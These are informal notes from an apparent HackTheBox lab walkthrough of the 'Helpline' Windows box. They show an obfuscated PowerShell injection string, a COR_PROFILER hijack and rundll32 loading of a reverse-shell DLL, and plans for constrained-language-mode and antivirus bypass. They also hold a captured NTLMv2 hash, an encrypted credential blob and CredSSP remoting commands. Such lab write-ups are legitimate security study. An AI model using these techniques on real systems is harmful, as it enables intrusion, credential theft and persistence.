<p>you may also set env values using $env:userdomain=&lsquo;foo&rsquo; this is how you set user session variables everything is reset and does not affect other users.</p>

<pre><code>[Environment]::SetEnvironmentVariable(&quot;Test&quot;, &quot;Test value.&quot;, &quot;User&quot;)
1
	
[Environment]::SetEnvironmentVariable(&quot;Test&quot;, &quot;Test value.&quot;, &quot;User&quot;)
</code></pre>

<p>in summary i can&rsquo;t use values i set 8</p>

<p>so finally figured out what -m does for setx it sets it for all users pretty neat. tolu does not have the permissions needed to effect all users</p>

<p>backups.txt</p>

<pre><code>;$env:pathext[0]+$env:PUBLIC[2]+$env:COMPUTERNAME[4]+$env:pathext[0]+$env:pathext[16]+$env:pathext[17]+$env:pathext[18]|powershell
</code></pre>

<p>l.cmd</p>

<pre><code>set &quot;COR_ENABLE_PROFILING=1&quot;
set &quot;COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}&quot;
set &quot;COR_PROFILER_PATH=C:\Windows\System32\spool\drivers\color\revshell.dll&quot;
tzsync
</code></pre>

<p><a href="https://stackoverflow.com/questions/3803581/setting-a-system-environment-variable-from-a-windows-batch-file">https://stackoverflow.com/questions/3803581/setting-a-system-environment-variable-from-a-windows-batch-file</a></p>

<pre><code>set &quot;COR_ENABLE_PROFILING=1&quot;
set &quot;COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}&quot;
set &quot;COR_PROFILER_PATH=c:\windows\system32\drivers\spool\color\revshell.dll&quot;
tzsync
</code></pre>

<p>in leo documents theres the run.ps1 script. then in desktop find a admin-pass.xml file</p>

<pre><code>01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f2fefa98a0d84f4b917dd8a1f5889c8100000000020000000000106600000001000020000000c2d2dd6646fb78feb6f7920ed36b0ade40efeaec6b090556fe6efb52a7e847cc000000000e8000000002000020000000c41d656142bd869ea7eeae22fc00f0f707ebd676a7f5fe04a0d0932dffac3f48300000006cbf505e52b6e132a07de261042bcdca80d0d12ce7e8e60022ff8d9bc042a437a1c49aa0c7943c58e802d1c758fc5dd340000000c4a81c4415883f937970216c5d91acbf80def08ad70a02b061ec88c9bb4ecd14301828044fefc3415f5e128cfb389cbe8968feb8785914070e8aebd6504afcaa
</code></pre>

<pre><code>leo::HELPLINE:34a034b5ad34d844:9E05787B6F70F68C9BAAA127DE5916F2:0101000000000000C0653150DE09D201DE5D7511FE421CA5000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000200000DE64D50BEE80408A23C06A8E9BF1F9435D8DCF2135E6C75AD19F58C59E7267C00A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E00310031003800000000000000000000000000
</code></pre>

<p>using the same shell from the cor profiler you can use that with <code>rundll32</code> and get a shell that way and i would like to note doing it this way the shell can run powershell.</p>

<p>so rundll32 will run a dll you can also use it on a revshell but it wont bypass anything.</p>

<pre><code>rundll32 revshell.dll,main Control_RunDLL
</code></pre>

<pre><code>
</code></pre>

<p>managed to get powershdll to work by using double quotes around the script and ending it with a simi colon.</p>

<p>idea&rsquo;s with clm bypassed i may no longer need to use cor profiler trick but id like to test out if i can get powershell running based on running the dll with rundll32 it does support powershell. Also test if that bypasses clm. Next use the first part of the bypass run a nishang as leo. Then start enumerating the system more we could also pivot to a meterpreter shell which would be best. then there should be a bunch of ways to get administrator.</p>

<p>next, if that all fails enumerate the e drive more. then move back to the base64 string that&rsquo;s encrypted. MOVE THE .XML FILE OFF. run file against it. maybe theres a clue there.</p>

<p>check the e:\ drive for clues.</p>

<p>when using the c revshell used to create the dlls u have to use the full path.</p>

<pre><code>C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
</code></pre>

<p>av detects the meterpreter  shell and closes it so i haven&rsquo;t bypassed av boo. lol</p>

<p>Still no leads on admin-pass.xml  i think the major lead is that it in a xml file.</p>

<p>bypassing <strong>clm</strong></p>

<p>/usr/share/responder/logs/n responder saves previous hashes here.</p>

<pre><code>Host Name:                 HELPLINE                                                                       
OS Name:                   Microsoft Windows Server 2019 Standard                                         
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server                                                              
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:                                                                                  
Product ID:                00429-00521-62775-AA118                                                        
Original Install Date:     12/20/2018, 10:07:26 PM                                                        
System Boot Time:          7/30/2019, 9:39:00 PM                                                          
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC                                                                   
Processor(s):              2 Processor(s) Installed.                                                      
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2993 Mhz              
                           [02]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2993 Mhz              
BIOS Version:              VMware, Inc. VMW71.00V.11599183.B64.1901030933, 1/3/2019                       
Windows Directory:         C:\Windows                                                                     
System Directory:          C:\Windows\system32                                                            
Boot Device:               \Device\HarddiskVolume1                                                        
System Locale:             en-us;English (United States)                                                  
Input Locale:              en-us;English (United States)                                                  
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London                                  
Total Physical Memory:     4,095 MB                                                                       
Available Physical Memory: 1,839 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,489 MB
Virtual Memory: In Use:    2,310 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              \\HELPLINE
Hotfix(s):                 7 Hotfix(s) Installed.
                           [01]: KB4462930
                           [02]: KB4470502
                           [03]: KB4470788
                           [04]: KB4471331
                           [05]: KB4480056
                           [06]: KB4480979
                           [07]: KB4480116
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection                               
                                 Connection Name: Ethernet0                                               
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.132
                                 [02]: fe80::fd05:3add:8e71:eca1                                          
                                 [03]: dead:beef::fd05:3add:8e71:eca1                                     
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displa
yed.

</code></pre>

<p>mb@letmein@SERVER#acc</p>

<p>setting up ccp was touguh first need to edit the local dns file.</p>

<pre><code>c:\windows\system32\drivers\etc\hosts
</code></pre>

<p><img src="local-dns.PNG" alt="local-dns" /></p>

<p>then need to add helpline.htb to trusted hosts</p>

<pre><code> Enable-WSManCredSSP -Role Client -DelegateComputer {helpline.htb}
</code></pre>

<p>it will prompt for the password and bam</p>

<pre><code> Enter-PSSession -ComputerName helpline.htb -Credential administrator -authentication credssp
</code></pre>



    
    
        <div class="chevrons">
    <div id="navigation">
<a class="nav nav-prev" href="/hackthebox/boxes/helpline/writeup/" title="HelpLine-WriteUp"> <i class="fa fa-chevron-left"></i><label>HelpLine-WriteUp</label></a>
    <a class="nav nav-next" href="/hackthebox/boxes/legacy/" title="Legacy" style="margin-right: 0px;"><label>Legacy</label><i class="fa fa-chevron-right"></i></a></div>
  </div>

  </section>
</article>

<footer>

<div class="footline">
    

    

    

    
    <div class="github-link">
      <a href="https://chickenpwny.github.ioHackTheBox/Boxes/helpline/notes/_index.md" target="blank"><i class="fa fa-code-fork"></i>
        Improve this page</a>
    </div>
    
  </div>


	<div>


  
    Create a content/_footer.md file to customize the footer content
  



	</div>
</footer>

<script src="/js/clipboard.min.js"></script>

<link href="/css/featherlight.min.css" rel="stylesheet">
<script src="/js/featherlight.min.js"></script>



<script src="/theme-flex/script.js"></script>


    

    
    

    
  </body>
</html>